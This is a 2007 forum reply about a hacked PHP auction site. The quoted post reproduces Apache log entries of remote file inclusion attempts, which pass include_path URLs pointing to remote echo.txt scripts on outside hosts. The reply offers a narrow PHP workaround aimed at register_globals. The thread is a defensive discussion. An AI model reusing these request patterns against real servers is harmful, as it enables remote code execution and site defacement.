|
|
Posted by Jean Gaudreau on 10/16/07 13:28
On Oct 14, 9:56 pm, "Charles Crume"
<NOccsS...@charlescrumesoftware.com> wrote:
> Hello Everyone;
>
> My site was hacked the other day -- someone was able to rename my
> index.shtml file and put their own index.html file on my server. Not sure
> how it was done, but looking through the log file, I found a lots and lots
> of entries where an "include_path" parameter was included in the URL of the
> PHP page, as shown below:
>
> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>
> I know how "include_path" works when *in* the PHP file, but I'm not sure
> what the effect of including it in the URL. A number of entries show a code
> 404 as the culprits are obviously phising for pages, but requests with
> return code 200 are showing a large number of bytes transferred -- far
> larger than the PHP page itself.
>
> Can someone explain what adding "include_path" to a URL does?
>
> Is there something I need to check on my server of how I've got Apache
> configured?
>
> TIA.
>
> Charles...
Hi,
I've been the target also of a hacker, with the same attack.
Add this to you script:
=====
$php_self = $_SERVER['PHP_SELF'];
if (($php_self == "/auction/includes/settings.inc.php") &&
(ini_get(register_globals))) {
$rg = array_keys($_REQUEST);
foreach($rg as $var)
{
if ($_REQUEST[$var] === $$var)
{
unset($$var);
exit;
}
}
}
=======
This will check if they are running the file, if register_globals is
enabled catch the parameters and unset them then halt the script.
So far it is working.
Jean
Navigation:
[Reply to this message]
|